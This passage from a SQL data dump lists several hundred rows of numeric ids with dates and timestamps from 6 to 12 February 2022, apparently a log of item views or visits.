02:01:27'),(44468,1604,1,'2022-02-06','2022-02-06 02:01:36'),(44469,2154,1,'2022-02-06','2022-02-06 03:12:15'),(44470,1718,1,'2022-02-06','2022-02-06 04:00:49'),(44471,1726,1,'2022-02-06','2022-02-06 04:20:53'),(44472,2159,1,'2022-02-06','2022-02-06 05:10:06'),(44473,3313,1,'2022-02-06','2022-02-06 06:00:52'),(44474,3664,1,'2022-02-06','2022-02-06 06:23:07'),(44475,570,1,'2022-02-06','2022-02-06 06:30:53'),(44476,486,1,'2022-02-06','2022-02-06 06:47:27'),(44477,470,1,'2022-02-06','2022-02-06 07:00:53'),(44478,2297,1,'2022-02-06','2022-02-06 07:11:43'),(44479,1602,1,'2022-02-06','2022-02-06 07:14:53'),(44480,472,1,'2022-02-06','2022-02-06 07:29:17'),(44481,1588,1,'2022-02-06','2022-02-06 07:48:08'),(44482,3781,1,'2022-02-06','2022-02-06 08:03:09'),(44483,2309,1,'2022-02-06','2022-02-06 08:09:10'),(44484,1598,1,'2022-02-06','2022-02-06 08:23:20'),(44485,1602,1,'2022-02-06','2022-02-06 08:38:20'),(44486,4542,1,'2022-02-06','2022-02-06 08:53:17'),(44487,1598,1,'2022-02-06','2022-02-06 09:00:54'),(44488,102,1,'2022-02-06','2022-02-06 09:23:18'),(44489,3096,1,'2022-02-06','2022-02-06 09:30:50'),(44490,2991,1,'2022-02-06','2022-02-06 09:58:28'),(44491,2457,1,'2022-02-06','2022-02-06 10:53:53'),(44492,1608,1,'2022-02-06','2022-02-06 11:37:00'),(44493,486,1,'2022-02-06','2022-02-06 12:20:53'),(44494,1695,1,'2022-02-06','2022-02-06 13:06:33'),(44495,1614,1,'2022-02-06','2022-02-06 13:30:34'),(44496,1606,1,'2022-02-06','2022-02-06 13:32:44'),(44497,4457,1,'2022-02-06','2022-02-06 13:50:56'),(44498,108,1,'2022-02-06','2022-02-06 14:02:32'),(44499,2704,1,'2022-02-06','2022-02-06 14:16:57'),(44500,1772,1,'2022-02-06','2022-02-06 15:14:57'),(44501,4326,1,'2022-02-06','2022-02-06 15:25:27'),(44502,1732,1,'2022-02-06','2022-02-06 15:32:03'),(44503,1610,1,'2022-02-06','2022-02-06 15:54:56'),(44504,1544,1,'2022-02-06','2022-02-06 16:01:52'),(44505,1544,1,'2022-02-06','2022-02-06 16:47:13'),(44506,87,1,'2022-02-06','2022-02-06 16:47:44'),(44507,2813,1,'2022-02-06','2022-02-06 17:33:46'),(44508,3297,1,'2022-02-06','2022-02-06 17:34:40'),(44509,2813,1,'2022-02-06','2022-02-06 17:37:47'),(44510,72,1,'2022-02-06','2022-02-06 18:09:24'),(44511,570,1,'2022-02-06','2022-02-06 18:16:49'),(44512,1709,1,'2022-02-06','2022-02-06 19:31:52'),(44513,3316,1,'2022-02-06','2022-02-06 19:33:03'),(44514,3486,1,'2022-02-06','2022-02-06 19:38:04'),(44515,3072,1,'2022-02-06','2022-02-06 20:31:53'),(44516,2159,1,'2022-02-06','2022-02-06 21:11:26'),(44517,87,1,'2022-02-06','2022-02-06 21:38:03'),(44518,1718,1,'2022-02-06','2022-02-06 22:01:33'),(44519,3706,1,'2022-02-06','2022-02-06 22:08:05'),(44520,469,1,'2022-02-06','2022-02-06 22:35:02'),(44521,3096,1,'2022-02-06','2022-02-06 22:43:22'),(44522,1600,1,'2022-02-06','2022-02-06 22:51:43'),(44523,1606,1,'2022-02-06','2022-02-06 22:54:54'),(44524,467,1,'2022-02-06','2022-02-06 23:08:03'),(44525,3749,1,'2022-02-06','2022-02-06 23:08:27'),(44526,1606,1,'2022-02-06','2022-02-06 23:15:50'),(44527,4326,1,'2022-02-06','2022-02-06 23:45:53'),(44528,1720,1,'2022-02-07','2022-02-07 01:32:58'),(44529,1586,1,'2022-02-07','2022-02-07 01:42:37'),(44530,2503,1,'2022-02-07','2022-02-07 02:43:50'),(44531,1606,1,'2022-02-07','2022-02-07 03:13:48'),(44532,4238,1,'2022-02-07','2022-02-07 03:29:55'),(44533,3038,1,'2022-02-07','2022-02-07 03:43:49'),(44534,1610,1,'2022-02-07','2022-02-07 03:53:02'),(44535,1870,1,'2022-02-07','2022-02-07 03:59:52'),(44536,4391,1,'2022-02-07','2022-02-07 04:29:55'),(44537,2558,1,'2022-02-07','2022-02-07 05:20:36'),(44538,4542,1,'2022-02-07','2022-02-07 05:31:41'),(44539,4542,1,'2022-02-07','2022-02-07 06:01:40'),(44540,2309,1,'2022-02-07','2022-02-07 06:15:20'),(44541,2410,1,'2022-02-07','2022-02-07 06:34:23'),(44542,80,1,'2022-02-07','2022-02-07 07:22:54'),(44543,2813,1,'2022-02-07','2022-02-07 07:29:06'),(44544,3787,1,'2022-02-07','2022-02-07 07:48:32'),(44545,4404,1,'2022-02-07','2022-02-07 08:36:09'),(44546,1608,1,'2022-02-07','2022-02-07 09:01:54'),(44547,4432,1,'2022-02-07','2022-02-07 09:25:20'),(44548,3282,1,'2022-02-07','2022-02-07 09:31:53'),(44549,4335,1,'2022-02-07','2022-02-07 09:41:17'),(44550,72,1,'2022-02-07','2022-02-07 09:49:15'),(44551,108,1,'2022-02-07','2022-02-07 10:04:51'),(44552,80,1,'2022-02-07','2022-02-07 10:22:59'),(44553,1608,1,'2022-02-07','2022-02-07 10:31:55'),(44554,1544,1,'2022-02-07','2022-02-07 10:56:52'),(44555,1728,1,'2022-02-07','2022-02-07 11:38:25'),(44556,1728,1,'2022-02-07','2022-02-07 11:38:53'),(44557,1728,1,'2022-02-07','2022-02-07 11:39:14'),(44558,1728,1,'2022-02-07','2022-02-07 11:40:08'),(44559,4329,1,'2022-02-07','2022-02-07 11:48:45'),(44560,486,1,'2022-02-07','2022-02-07 11:49:22'),(44561,3438,1,'2022-02-07','2022-02-07 12:11:17'),(44562,3430,1,'2022-02-07','2022-02-07 12:11:18'),(44563,2956,1,'2022-02-07','2022-02-07 12:11:18'),(44564,3498,1,'2022-02-07','2022-02-07 12:11:19'),(44565,3482,1,'2022-02-07','2022-02-07 12:11:23'),(44566,3742,1,'2022-02-07','2022-02-07 12:11:53'),(44567,1596,1,'2022-02-07','2022-02-07 12:34:24'),(44568,1596,1,'2022-02-07','2022-02-07 12:35:14'),(44569,4408,1,'2022-02-07','2022-02-07 12:52:26'),(44570,1582,1,'2022-02-07','2022-02-07 12:53:05'),(44571,4408,1,'2022-02-07','2022-02-07 12:55:02'),(44572,1610,1,'2022-02-07','2022-02-07 13:16:05'),(44573,3127,1,'2022-02-07','2022-02-07 13:19:25'),(44574,1600,1,'2022-02-07','2022-02-07 13:20:37'),(44575,2989,1,'2022-02-07','2022-02-07 13:35:22'),(44576,4335,1,'2022-02-07','2022-02-07 13:41:18'),(44577,4335,1,'2022-02-07','2022-02-07 13:41:19'),(44578,4335,1,'2022-02-07','2022-02-07 13:41:37'),(44579,76,1,'2022-02-07','2022-02-07 13:42:09'),(44580,2159,1,'2022-02-07','2022-02-07 13:58:22'),(44581,2159,1,'2022-02-07','2022-02-07 13:58:22'),(44582,2159,1,'2022-02-07','2022-02-07 13:58:26'),(44583,4238,1,'2022-02-07','2022-02-07 13:58:28'),(44584,1588,1,'2022-02-07','2022-02-07 14:04:18'),(44585,1600,1,'2022-02-07','2022-02-07 14:05:57'),(44586,1600,1,'2022-02-07','2022-02-07 14:19:23'),(44587,1586,1,'2022-02-07','2022-02-07 14:23:58'),(44588,1582,1,'2022-02-07','2022-02-07 14:27:31'),(44589,4444,1,'2022-02-07','2022-02-07 14:28:38'),(44590,1600,1,'2022-02-07','2022-02-07 14:29:22'),(44591,1600,1,'2022-02-07','2022-02-07 14:31:46'),(44592,1728,1,'2022-02-07','2022-02-07 14:34:00'),(44593,1728,1,'2022-02-07','2022-02-07 14:35:26'),(44594,1600,1,'2022-02-07','2022-02-07 14:36:24'),(44595,1728,1,'2022-02-07','2022-02-07 14:37:49'),(44596,3479,1,'2022-02-07','2022-02-07 14:54:00'),(44597,3479,1,'2022-02-07','2022-02-07 14:54:16'),(44598,1600,1,'2022-02-07','2022-02-07 15:23:45'),(44599,1870,1,'2022-02-07','2022-02-07 15:28:25'),(44600,1600,1,'2022-02-07','2022-02-07 15:41:41'),(44601,2457,1,'2022-02-07','2022-02-07 15:50:23'),(44602,4457,1,'2022-02-07','2022-02-07 15:54:13'),(44603,1602,1,'2022-02-07','2022-02-07 16:11:22'),(44604,4448,1,'2022-02-07','2022-02-07 16:30:06'),(44605,1594,1,'2022-02-07','2022-02-07 17:00:44'),(44606,4448,1,'2022-02-07','2022-02-07 17:28:24'),(44607,2309,1,'2022-02-07','2022-02-07 17:49:25'),(44608,1598,1,'2022-02-07','2022-02-07 17:51:27'),(44609,72,1,'2022-02-07','2022-02-07 18:21:01'),(44610,1614,1,'2022-02-07','2022-02-07 19:19:24'),(44611,4391,1,'2022-02-07','2022-02-07 19:28:24'),(44612,68,1,'2022-02-07','2022-02-07 19:49:22'),(44613,1596,1,'2022-02-07','2022-02-07 19:50:25'),(44614,1602,1,'2022-02-07','2022-02-07 20:19:22'),(44615,1600,1,'2022-02-07','2022-02-07 20:28:40'),(44616,2420,1,'2022-02-07','2022-02-07 20:49:23'),(44617,2309,1,'2022-02-07','2022-02-07 21:15:46'),(44618,2159,1,'2022-02-07','2022-02-07 21:19:00'),(44619,2769,1,'2022-02-07','2022-02-07 21:30:34'),(44620,2769,1,'2022-02-07','2022-02-07 21:35:49'),(44621,1718,1,'2022-02-07','2022-02-07 21:58:54'),(44622,2297,1,'2022-02-07','2022-02-07 21:58:59'),(44623,1598,1,'2022-02-07','2022-02-07 22:38:53'),(44624,3698,1,'2022-02-07','2022-02-07 22:58:53'),(44625,2154,1,'2022-02-07','2022-02-07 22:59:04'),(44626,2410,1,'2022-02-07','2022-02-07 23:18:52'),(44627,2769,1,'2022-02-07','2022-02-07 23:38:54'),(44628,1604,1,'2022-02-07','2022-02-07 23:58:53'),(44629,1594,1,'2022-02-08','2022-02-08 00:18:53'),(44630,4524,1,'2022-02-08','2022-02-08 00:38:59'),(44631,2297,1,'2022-02-08','2022-02-08 00:58:55'),(44632,1877,1,'2022-02-08','2022-02-08 01:18:53'),(44633,72,1,'2022-02-08','2022-02-08 01:21:04'),(44634,3285,1,'2022-02-08','2022-02-08 01:40:45'),(44635,2297,1,'2022-02-08','2022-02-08 01:59:18'),(44636,472,1,'2022-02-08','2022-02-08 01:59:48'),(44637,1592,1,'2022-02-08','2022-02-08 02:18:54'),(44638,1612,1,'2022-02-08','2022-02-08 02:38:54'),(44639,2154,1,'2022-02-08','2022-02-08 02:58:53'),(44640,1608,1,'2022-02-08','2022-02-08 03:08:00'),(44641,1606,1,'2022-02-08','2022-02-08 03:08:02'),(44642,108,1,'2022-02-08','2022-02-08 03:37:59'),(44643,2609,1,'2022-02-08','2022-02-08 03:38:02'),(44644,2609,1,'2022-02-08','2022-02-08 03:38:19'),(44645,2609,1,'2022-02-08','2022-02-08 03:38:26'),(44646,1544,1,'2022-02-08','2022-02-08 04:08:03'),(44647,1695,1,'2022-02-08','2022-02-08 04:08:06'),(44648,1709,1,'2022-02-08','2022-02-08 04:37:59'),(44649,2159,1,'2022-02-08','2022-02-08 05:54:26'),(44650,3245,1,'2022-02-08','2022-02-08 06:12:55'),(44651,3072,1,'2022-02-08','2022-02-08 06:16:28'),(44652,2801,1,'2022-02-08','2022-02-08 06:32:55'),(44653,1586,1,'2022-02-08','2022-02-08 06:42:54'),(44654,2769,1,'2022-02-08','2022-02-08 06:52:55'),(44655,570,1,'2022-02-08','2022-02-08 07:14:08'),(44656,1608,1,'2022-02-08','2022-02-08 07:24:51'),(44657,3731,1,'2022-02-08','2022-02-08 07:45:28'),(44658,1586,1,'2022-02-08','2022-02-08 07:52:54'),(44659,3072,1,'2022-02-08','2022-02-08 08:21:14'),(44660,2804,1,'2022-02-08','2022-02-08 08:22:54'),(44661,2801,1,'2022-02-08','2022-02-08 08:32:54'),(44662,3781,1,'2022-02-08','2022-02-08 08:44:19'),(44663,570,1,'2022-02-08','2022-02-08 08:52:55'),(44664,3764,1,'2022-02-08','2022-02-08 09:02:55'),(44665,1588,1,'2022-02-08','2022-02-08 09:12:55'),(44666,3781,1,'2022-02-08','2022-02-08 09:22:54'),(44667,1732,1,'2022-02-08','2022-02-08 09:23:38'),(44668,3781,1,'2022-02-08','2022-02-08 09:23:59'),(44669,1586,1,'2022-02-08','2022-02-08 09:30:58'),(44670,1586,1,'2022-02-08','2022-02-08 09:31:37'),(44671,1600,1,'2022-02-08','2022-02-08 09:32:54'),(44672,72,1,'2022-02-08','2022-02-08 09:38:18'),(44673,3127,1,'2022-02-08','2022-02-08 09:43:24'),(44674,1602,1,'2022-02-08','2022-02-08 09:55:29'),(44675,1602,1,'2022-02-08','2022-02-08 09:56:05'),(44676,1602,1,'2022-02-08','2022-02-08 10:09:30'),(44677,3746,1,'2022-02-08','2022-02-08 10:22:53'),(44678,1602,1,'2022-02-08','2022-02-08 10:42:57'),(44679,1608,1,'2022-02-08','2022-02-08 10:51:30'),(44680,3710,1,'2022-02-08','2022-02-08 11:03:41'),(44681,2503,1,'2022-02-08','2022-02-08 11:10:14'),(44682,479,1,'2022-02-08','2022-02-08 11:12:55'),(44683,2309,1,'2022-02-08','2022-02-08 11:47:04'),(44684,2309,1,'2022-02-08','2022-02-08 11:47:27'),(44685,1722,1,'2022-02-08','2022-02-08 11:47:29'),(44686,4457,1,'2022-02-08','2022-02-08 11:51:47'),(44687,2420,1,'2022-02-08','2022-02-08 12:02:56'),(44688,1582,1,'2022-02-08','2022-02-08 12:12:56'),(44689,2813,1,'2022-02-08','2022-02-08 12:22:55'),(44690,2410,1,'2022-02-08','2022-02-08 12:32:55'),(44691,486,1,'2022-02-08','2022-02-08 12:52:59'),(44692,1614,1,'2022-02-08','2022-02-08 13:02:55'),(44693,1586,1,'2022-02-08','2022-02-08 13:05:09'),(44694,80,1,'2022-02-08','2022-02-08 13:05:15'),(44695,72,1,'2022-02-08','2022-02-08 13:33:19'),(44696,72,1,'2022-02-08','2022-02-08 13:37:49'),(44697,72,1,'2022-02-08','2022-02-08 13:49:58'),(44698,4566,1,'2022-02-08','2022-02-08 13:50:58'),(44699,1596,1,'2022-02-08','2022-02-08 14:11:37'),(44700,1612,1,'2022-02-08','2022-02-08 14:53:23'),(44701,1594,1,'2022-02-08','2022-02-08 15:03:41'),(44702,4457,1,'2022-02-08','2022-02-08 15:30:50'),(44703,4404,1,'2022-02-08','2022-02-08 15:45:11'),(44704,108,1,'2022-02-08','2022-02-08 17:14:57'),(44705,72,1,'2022-02-08','2022-02-08 17:28:03'),(44706,4576,1,'2022-02-08','2022-02-08 17:28:38'),(44707,4573,1,'2022-02-08','2022-02-08 17:28:39'),(44708,4576,1,'2022-02-08','2022-02-08 17:28:41'),(44709,4569,1,'2022-02-08','2022-02-08 17:29:56'),(44710,4569,1,'2022-02-08','2022-02-08 17:29:58'),(44711,3789,1,'2022-02-08','2022-02-08 17:30:00'),(44712,4566,1,'2022-02-08','2022-02-08 17:41:28'),(44713,1606,1,'2022-02-08','2022-02-08 17:45:44'),(44714,2309,1,'2022-02-08','2022-02-08 18:15:01'),(44715,4326,1,'2022-02-08','2022-02-08 18:21:11'),(44716,4326,1,'2022-02-08','2022-02-08 18:22:54'),(44717,1588,1,'2022-02-08','2022-02-08 18:45:52'),(44718,2297,1,'2022-02-08','2022-02-08 19:01:14'),(44719,4457,1,'2022-02-08','2022-02-08 19:03:30'),(44720,89,1,'2022-02-08','2022-02-08 19:03:57'),(44721,4457,1,'2022-02-08','2022-02-08 19:04:04'),(44722,68,1,'2022-02-08','2022-02-08 19:04:12'),(44723,4457,1,'2022-02-08','2022-02-08 19:04:22'),(44724,1718,1,'2022-02-08','2022-02-08 19:30:00'),(44725,68,1,'2022-02-08','2022-02-08 20:29:57'),(44726,2457,1,'2022-02-08','2022-02-08 20:59:56'),(44727,3691,1,'2022-02-08','2022-02-08 21:12:46'),(44728,3117,1,'2022-02-08','2022-02-08 21:40:52'),(44729,4238,1,'2022-02-08','2022-02-08 22:03:57'),(44730,1592,1,'2022-02-08','2022-02-08 22:48:54'),(44731,1718,1,'2022-02-08','2022-02-08 22:59:56'),(44732,87,1,'2022-02-08','2022-02-08 23:04:01'),(44733,1870,1,'2022-02-08','2022-02-08 23:04:02'),(44734,1602,1,'2022-02-08','2022-02-08 23:23:37'),(44735,486,1,'2022-02-08','2022-02-08 23:59:57'),(44736,72,1,'2022-02-09','2022-02-09 01:18:49'),(44737,4400,1,'2022-02-09','2022-02-09 01:50:49'),(44738,1608,1,'2022-02-09','2022-02-09 02:52:29'),(44739,1606,1,'2022-02-09','2022-02-09 02:53:24'),(44740,1606,1,'2022-02-09','2022-02-09 03:57:17'),(44741,1709,1,'2022-02-09','2022-02-09 03:58:39'),(44742,468,1,'2022-02-09','2022-02-09 04:18:43'),(44743,1695,1,'2022-02-09','2022-02-09 04:51:59'),(44744,1544,1,'2022-02-09','2022-02-09 04:52:02'),(44745,2159,1,'2022-02-09','2022-02-09 05:09:07'),(44746,3489,1,'2022-02-09','2022-02-09 05:27:53'),(44747,1600,1,'2022-02-09','2022-02-09 05:37:16'),(44748,1594,1,'2022-02-09','2022-02-09 05:48:42'),(44749,3489,1,'2022-02-09','2022-02-09 06:24:21'),(44750,2813,1,'2022-02-09','2022-02-09 07:01:57'),(44751,2297,1,'2022-02-09','2022-02-09 09:27:28'),(44752,3072,1,'2022-02-09','2022-02-09 09:35:04'),(44753,3226,1,'2022-02-09','2022-02-09 10:04:08'),(44754,4457,1,'2022-02-09','2022-02-09 10:27:39'),(44755,4457,1,'2022-02-09','2022-02-09 10:36:43'),(44756,4566,1,'2022-02-09','2022-02-09 10:49:54'),(44757,4561,1,'2022-02-09','2022-02-09 11:15:55'),(44758,1602,1,'2022-02-09','2022-02-09 11:54:48'),(44759,80,1,'2022-02-09','2022-02-09 11:55:41'),(44760,80,1,'2022-02-09','2022-02-09 12:02:19'),(44761,2704,1,'2022-02-09','2022-02-09 12:43:49'),(44762,84,1,'2022-02-09','2022-02-09 12:46:36'),(44763,87,1,'2022-02-09','2022-02-09 13:00:53'),(44764,2297,1,'2022-02-09','2022-02-09 13:06:10'),(44765,1774,1,'2022-02-09','2022-02-09 14:06:15'),(44766,2704,1,'2022-02-09','2022-02-09 14:37:33'),(44767,1604,1,'2022-02-09','2022-02-09 14:38:57'),(44768,1594,1,'2022-02-09','2022-02-09 14:43:00'),(44769,1594,1,'2022-02-09','2022-02-09 14:44:44'),(44770,4238,1,'2022-02-09','2022-02-09 14:45:01'),(44771,1544,1,'2022-02-09','2022-02-09 14:49:02'),(44772,108,1,'2022-02-09','2022-02-09 14:56:46'),(44773,72,1,'2022-02-09','2022-02-09 16:16:56'),(44774,1614,1,'2022-02-09','2022-02-09 16:17:43'),(44775,1602,1,'2022-02-09','2022-02-09 16:36:29'),(44776,1582,1,'2022-02-09','2022-02-09 17:12:12'),(44777,2159,1,'2022-02-09','2022-02-09 17:16:50'),(44778,1718,1,'2022-02-09','2022-02-09 18:41:38'),(44779,1600,1,'2022-02-09','2022-02-09 20:05:43'),(44780,2395,1,'2022-02-09','2022-02-09 20:35:41'),(44781,3117,1,'2022-02-09','2022-02-09 22:40:26'),(44782,2297,1,'2022-02-10','2022-02-10 00:53:08'),(44783,72,1,'2022-02-10','2022-02-10 01:03:14'),(44784,2154,1,'2022-02-10','2022-02-10 01:06:39'),(44785,108,1,'2022-02-10','2022-02-10 03:33:57'),(44786,87,1,'2022-02-10','2022-02-10 04:16:24'),(44787,3790,1,'2022-02-10','2022-02-10 04:31:47'),(44788,2410,1,'2022-02-10','2022-02-10 04:57:32'),(44789,4556,1,'2022-02-10','2022-02-10 05:06:30'),(44790,1614,1,'2022-02-10','2022-02-10 05:54:35'),(44791,1602,1,'2022-02-10','2022-02-10 06:11:03'),(44792,1602,1,'2022-02-10','2022-02-10 06:11:38'),(44793,1582,1,'2022-02-10','2022-02-10 06:24:37'),(44794,4238,1,'2022-02-10','2022-02-10 06:40:03'),(44795,1870,1,'2022-02-10','2022-02-10 07:04:09'),(44796,1582,1,'2022-02-10','2022-02-10 07:17:58'),(44797,1544,1,'2022-02-10','2022-02-10 07:21:00'),(44798,4448,1,'2022-02-10','2022-02-10 07:37:28'),(44799,1544,1,'2022-02-10','2022-02-10 07:47:19'),(44800,3066,1,'2022-02-10','2022-02-10 08:03:54'),(44801,80,1,'2022-02-10','2022-02-10 08:13:12'),(44802,80,1,'2022-02-10','2022-02-10 08:14:47'),(44803,4457,1,'2022-02-10','2022-02-10 08:20:00'),(44804,89,1,'2022-02-10','2022-02-10 08:20:31'),(44805,1608,1,'2022-02-10','2022-02-10 08:21:44'),(44806,89,1,'2022-02-10','2022-02-10 08:22:02'),(44807,4457,1,'2022-02-10','2022-02-10 08:22:06'),(44808,1718,1,'2022-02-10','2022-02-10 08:39:36'),(44809,4457,1,'2022-02-10','2022-02-10 08:52:31'),(44810,91,1,'2022-02-10','2022-02-10 08:53:09'),(44811,87,1,'2022-02-10','2022-02-10 08:53:44'),(44812,1718,1,'2022-02-10','2022-02-10 09:04:16'),(44813,1608,1,'2022-02-10','2022-02-10 09:21:02'),(44814,72,1,'2022-02-10','2022-02-10 09:33:16'),(44815,3790,1,'2022-02-10','2022-02-10 10:33:39'),(44816,1602,1,'2022-02-10','2022-02-10 10:38:00'),(44817,80,1,'2022-02-10','2022-02-10 10:38:55'),(44818,1602,1,'2022-02-10','2022-02-10 10:39:27'),(44819,4524,1,'2022-02-10','2022-02-10 10:41:17'),(44820,2297,1,'2022-02-10','2022-02-10 11:27:48'),(44821,3117,1,'2022-02-10','2022-02-10 11:27:53'),(44822,1604,1,'2022-02-10','2022-02-10 11:38:01'),(44823,68,1,'2022-02-10','2022-02-10 11:44:53'),(44824,3781,1,'2022-02-10','2022-02-10 12:41:53'),(44825,80,1,'2022-02-10','2022-02-10 12:42:52'),(44826,80,1,'2022-02-10','2022-02-10 12:43:59'),(44827,3781,1,'2022-02-10','2022-02-10 12:46:03'),(44828,2769,1,'2022-02-10','2022-02-10 12:47:49'),(44829,1602,1,'2022-02-10','2022-02-10 12:51:57'),(44830,1602,1,'2022-02-10','2022-02-10 13:02:18'),(44831,472,1,'2022-02-10','2022-02-10 13:47:48'),(44832,4238,1,'2022-02-10','2022-02-10 14:04:10'),(44833,3060,1,'2022-02-10','2022-02-10 14:08:30'),(44834,3060,1,'2022-02-10','2022-02-10 14:29:49'),(44835,3060,1,'2022-02-10','2022-02-10 14:31:03'),(44836,486,1,'2022-02-10','2022-02-10 14:48:04'),(44837,2154,1,'2022-02-10','2022-02-10 15:23:50'),(44838,87,1,'2022-02-10','2022-02-10 15:43:50'),(44839,485,1,'2022-02-10','2022-02-10 15:44:03'),(44840,87,1,'2022-02-10','2022-02-10 15:44:08'),(44841,76,1,'2022-02-10','2022-02-10 15:44:19'),(44842,2503,1,'2022-02-10','2022-02-10 15:44:56'),(44843,2154,1,'2022-02-10','2022-02-10 15:53:55'),(44844,76,1,'2022-02-10','2022-02-10 16:05:20'),(44845,87,1,'2022-02-10','2022-02-10 16:05:38'),(44846,91,1,'2022-02-10','2022-02-10 16:06:04'),(44847,76,1,'2022-02-10','2022-02-10 16:06:20'),(44848,2503,1,'2022-02-10','2022-02-10 16:07:36'),(44849,72,1,'2022-02-10','2022-02-10 16:08:01'),(44850,108,1,'2022-02-10','2022-02-10 16:08:33'),(44851,84,1,'2022-02-10','2022-02-10 16:09:09'),(44852,1718,1,'2022-02-10','2022-02-10 16:48:45'),(44853,474,1,'2022-02-10','2022-02-10 17:29:41'),(44854,473,1,'2022-02-10','2022-02-10 17:30:17'),(44855,1608,1,'2022-02-10','2022-02-10 17:50:56'),(44856,1606,1,'2022-02-10','2022-02-10 17:50:58'),(44857,2704,1,'2022-02-10','2022-02-10 18:01:07'),(44858,108,1,'2022-02-10','2022-02-10 18:20:47'),(44859,108,1,'2022-02-10','2022-02-10 18:50:49'),(44860,1608,1,'2022-02-10','2022-02-10 18:51:01'),(44861,2159,1,'2022-02-10','2022-02-10 19:02:47'),(44862,469,1,'2022-02-10','2022-02-10 19:17:45'),(44863,1544,1,'2022-02-10','2022-02-10 19:20:49'),(44864,1594,1,'2022-02-10','2022-02-10 19:48:11'),(44865,4326,1,'2022-02-10','2022-02-10 19:51:13'),(44866,1695,1,'2022-02-10','2022-02-10 19:53:18'),(44867,1602,1,'2022-02-10','2022-02-10 20:13:26'),(44868,1602,1,'2022-02-10','2022-02-10 20:34:43'),(44869,2159,1,'2022-02-10','2022-02-10 20:47:45'),(44870,1709,1,'2022-02-10','2022-02-10 20:50:48'),(44871,3282,1,'2022-02-10','2022-02-10 20:50:50'),(44872,1699,1,'2022-02-10','2022-02-10 21:20:49'),(44873,2813,1,'2022-02-10','2022-02-10 21:33:05'),(44874,3072,1,'2022-02-10','2022-02-10 21:50:52'),(44875,1602,1,'2022-02-10','2022-02-10 21:51:32'),(44876,2309,1,'2022-02-10','2022-02-10 21:55:16'),(44877,2309,1,'2022-02-10','2022-02-10 22:02:55'),(44878,1600,1,'2022-02-10','2022-02-10 22:18:37'),(44879,4326,1,'2022-02-10','2022-02-10 22:20:49'),(44880,3664,1,'2022-02-10','2022-02-10 22:47:45'),(44881,1695,1,'2022-02-10','2022-02-10 22:50:51'),(44882,1699,1,'2022-02-10','2022-02-10 22:50:55'),(44883,486,1,'2022-02-10','2022-02-10 23:02:51'),(44884,2804,1,'2022-02-10','2022-02-10 23:55:45'),(44885,1602,1,'2022-02-11','2022-02-11 00:02:46'),(44886,472,1,'2022-02-11','2022-02-11 00:17:45'),(44887,468,1,'2022-02-11','2022-02-11 00:47:46'),(44888,1598,1,'2022-02-11','2022-02-11 01:17:45'),(44889,1544,1,'2022-02-11','2022-02-11 01:24:28'),(44890,1612,1,'2022-02-11','2022-02-11 02:03:31'),(44891,1598,1,'2022-02-11','2022-02-11 02:33:08'),(44892,1598,1,'2022-02-11','2022-02-11 03:49:33'),(44893,3789,1,'2022-02-11','2022-02-11 04:32:45'),(44894,2159,1,'2022-02-11','2022-02-11 06:49:27'),(44895,2813,1,'2022-02-11','2022-02-11 07:38:32'),(44896,1600,1,'2022-02-11','2022-02-11 09:32:45'),(44897,72,1,'2022-02-11','2022-02-11 10:15:54'),(44898,1602,1,'2022-02-11','2022-02-11 10:39:48'),(44899,1606,1,'2022-02-11','2022-02-11 11:06:48'),(44900,80,1,'2022-02-11','2022-02-11 11:33:24'),(44901,1606,1,'2022-02-11','2022-02-11 11:36:50'),(44902,1709,1,'2022-02-11','2022-02-11 12:08:33'),(44903,1544,1,'2022-02-11','2022-02-11 12:36:47'),(44904,3290,1,'2022-02-11','2022-02-11 16:10:36'),(44905,72,1,'2022-02-11','2022-02-11 17:29:08'),(44906,1602,1,'2022-02-11','2022-02-11 17:46:32'),(44907,2309,1,'2022-02-11','2022-02-11 18:02:25'),(44908,4424,1,'2022-02-11','2022-02-11 18:32:35'),(44909,4238,1,'2022-02-11','2022-02-11 18:54:01'),(44910,488,1,'2022-02-11','2022-02-11 18:57:39'),(44911,2297,1,'2022-02-11','2022-02-11 19:16:48'),(44912,2297,1,'2022-02-11','2022-02-11 19:45:36'),(44913,1614,1,'2022-02-11','2022-02-11 20:38:16'),(44914,2704,1,'2022-02-11','2022-02-11 20:57:27'),(44915,2154,1,'2022-02-11','2022-02-11 22:19:31'),(44916,4432,1,'2022-02-11','2022-02-11 23:23:41'),(44917,2159,1,'2022-02-11','2022-02-11 23:26:42'),(44918,1594,1,'2022-02-12','2022-02-12 00:44:46'),(44919,72,1,'2022-02-12','2022-02-12 01:05:38'),(44920,1608,1,'2022-02-12','2022-02-12 01:54:19'),(44921,108,1,'2022-02-12','2022-02-12 02:24:04'),(44922,108,1,'2022-02-12','2022-02-12 02:55:22'),(44923,1544,1,'2022-02-12','2022-02-12 03:23:48'),(44924,1718,1,'2022-02-12','2022-02-12 05:10:12'),(44925,2297,1,'2022-02-12','2022-02-12 05:53:24'),(44926,1588,1,'2022-02-12','2022-02-12 06:26:03'),(44927,1582,1,'2022-02-12','2022-02-12 07:19:44'),(44928,1614,1,'2022-02-12','2022-02-12 07:39:45'),(44929,1703,1,'2022-02-12','2022-02-12 08:00:47'),(44930,1582,1,'2022-02-12','2022-02-12 09:18:38'),(44931,1582,1,'2022-02-12','2022-02-12 09:20:49'),(44932,1586,1,'2022-02-12','2022-02-12 10:00:06'),(44933,1594,1,'2022-02-12','2022-02-12 10:00:18'),(44934,1594,1,'2022-02-12','2022-02-12 10:00:48'),(44935,4238,1,'2022-02-12','2022-02-12 10:49:54'),(44936,4238,1,'2022-02-12','2022-02-12 10:51:11'),(44937,1772,1,'2022-02-12','2022-02-12 11:45:15'),(44938,1870,1,'2022-02-12','2022-02-12 11:51:39'),(44939,1606,1,'2022-02-12','2022-02-12 11:57:06'),(44940,4448,1,'2022-02-12','2022-02-12 12:49:59'),(44941,1600,1,'2022-02-12','2022-02-12 13:59:13'),(44942,4551,1,'2022-02-12','2022-02-12 14:05:37'),(44943,3117,1,'2022-02-12','2022-02-12 14:13:18'),(44944,4416,1,'2022-02-12','2022-02-12 14:54:46'),(44945,1718,1,'2022-02-12','2022-02-12 14:55:47'),(44946,4457,1,'2022-02-12','2022-02-12 15:39:01'),(44947,2297,1,'2022-02-12','2022-02-12 15:41:28'),(44948,472,1,'2022-02-12','2022-02-12 15:54:56'),(44949,2297,1,'2022-02-12','2022-02-12 16:11:16'),(44950,1586,1,'2022-02-12','2022-02-12 18:14:05'),(44951,1586,1,'2022-02-12','2022-02-12 18:14:15'),(44952,2154,1,'2022-02-12','2022-02-12 18:19:36'),(44953,1602,1,'2022-02-12','2022-02-12 